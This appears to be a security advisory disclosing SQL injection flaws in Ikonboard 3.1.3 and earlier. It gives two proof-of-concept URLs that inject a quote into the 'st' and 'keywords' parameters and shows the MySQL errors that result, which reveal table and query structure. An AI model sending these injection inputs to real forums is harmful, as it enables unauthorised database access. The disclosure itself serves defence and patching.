Multiple SQL injection vulnerabilities have been found in Ikonboard allowing attackers to cause the program to execute arbitrary SQL statements as if it were its own.
Vulnerable Systems:
* Ikonboard version 3.1.3 and prior
1) SQL injection in "st" parameter Example: http://host/support/ikonboard.cgi?act=ST&f=27&t=13066&hl=nickname&st=1'
Result: Ikonboard CGI Error
-----------------------------------------------------------------------
Ikonboard has exited with the following error:
Can't query the data from 'forum_posts' Reason: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '', 20'
This error was reported at: line 1 Query: SELECT * FROM iB313_forum_posts WHERE TOPIC_ID = '13066' AND QUEUED <> '1' ORDER BY POST_DATE ASC LIMIT 1', 20
Please note that your 'real' paths have been removed to protect your information.
-----------------------------------------------------------------------
2) SQL injection in "keywords" parameter Example: http://host/support/ikonboard.cgi?act=Search&CODE=01&keywords='
&type=name&forums=all&search_in=all&prune=0
Result: Ikonboard CGI Error
-----------------------------------------------------------------------
Ikonboard has exited with the following error:
mySQL error
Can't query the data: You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near ') ORDER BY DATE DESC LIMIT 0,200'
This error was reported at: line 1
Please note that your 'real' paths have been removed to protect your information.
-----------------------------------------------------------------------